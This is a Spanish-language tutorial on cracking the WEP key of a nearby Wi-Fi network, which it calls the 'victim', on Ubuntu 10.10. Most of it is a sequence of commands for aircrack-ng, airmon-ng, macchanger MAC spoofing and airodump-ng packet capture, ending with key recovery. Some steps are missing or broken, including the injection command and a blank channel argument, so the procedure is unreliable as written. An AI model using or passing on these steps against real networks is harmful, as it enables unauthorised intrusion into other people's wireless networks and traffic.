Debilidad redes wifi (wep) con ubuntu 10.10

http://www.ubuntu.com/desktop/get-ubuntu/download

Primero abrimos un terminal y escribimos el comando "sudo su" para ser superusuario

sudo su

Instalar la suite Suite aircrack-ng

apt-get install aircrack-ng

Luego instalamos Macchanger

apt-get install macchanger

Despues necesitamos saber el nombre de nuestra tarjeta de red; para eso escribimos el comando "iwconfig" .

iwconfig

En micaso en wlan0

Nos aseguramos de no estar conectados a ninguna red y abrimos otra terminal:
Activamos modo monitor en nuestra tarjeta de red (NO EN TODAS SE PUEDE, SI NO SE PUEDE ACTIVAR, NO PODRÁS CRACKEAR)

airmon-ng start wlan0

Nos saldra que se activo mon0 asique trabajaremos con mon0
Damos de baja mon0

ifconfig mon0 down

Cambiamos la direccion mac de mon0 por 00:11:22:33:44:55

macchanger -m 00:11:22:33:44:55 mon0

Damos de alta mon0

ifconfig mon0 up

Escaneamos las redes disponibles, y encontraremos nuestra victima

airodump-ng mon0

Detenemos la escaneada pulsando

control – c

Les saldra algo asi

Ejecutamos airodump-ng, cambiando los datos de los corchetes por los de nuestra victima

airodump-ng -c -w [nombre red] --bssid [direccion MAC] mon0

En mi caso seria:

airodump-ng -c 6 -w xxxxx --bssid XX:XX:XX:XX:XX:XX mon0

Abrimos otra terminal escribimos de nuevo sudo su
Despues escribimos lo siguiente:

Esperan un poco y les saldra Use this packet y colocan "y"

Esperemos a juntar por lo meno 20.000 paquetes para poder descifral la clave wep
Una vez que ya los juntaron abren otra terminal y escriben sudo su de nuevo
Despues escriben:

aircrack-ng "nombre de red"-01.cap

Si les resulto bien les saldra "Key found" en formato

XX:XX:XX:XX:XX.... le borran los : y la dejan asiXXXXXXXXXX

y listo ya tienen la contraseña wep desifrada

Si no entienden muy bien aca les dejo un video explicativo: